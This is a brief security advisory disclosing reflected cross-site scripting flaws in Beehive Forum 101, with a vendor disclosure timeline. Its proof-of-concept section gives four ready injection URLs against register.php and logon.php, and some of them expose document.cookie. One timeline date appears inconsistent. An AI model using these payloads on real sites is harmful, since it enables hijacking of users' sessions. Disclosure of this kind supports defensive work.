Beehive Forum 101 Multiple XSS vulnerabilities

2012-01-2100:00:00

vulners.com

Advisory: Beehive Forum 101 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2011-042
Author: Stefan Schurtz
Affected Software: Successfully tested on Beehive Forum 101
Vendor URL: http://www.beehiveforum.co.uk/
Vendor Status: informed

==========================
Vulnerability Description

Beehive Forum 101 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit

// XSS
http://[target]/forum/register.php?'"</script><script>alert('XSS')</script>
http://[target]/forum/register.php/'"</script><script>alert(document.cookie)</script>
http://[target]/forum/logon.php?'"</script><script>alert('XSS')</script>
http://[target]/forum/logon.php/'"</script><script>alert(document.cookie)</script>

=========
Solution

====================
Disclosure Timeline

26-Dec-2011 - vendor informed
29-Dec-2011 - vendor feedback
15-Jan-2011 - no patch available

========
Credits

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References

http://www.darksecurity.de/advisories/SSCHADV2011-042.txt

JSON

Beehive Forum 101 Multiple XSS vulnerabilities

========================== Vulnerability Description

================== PoC-Exploit

========= Solution

==================== Disclosure Timeline

======== Credits

=========== References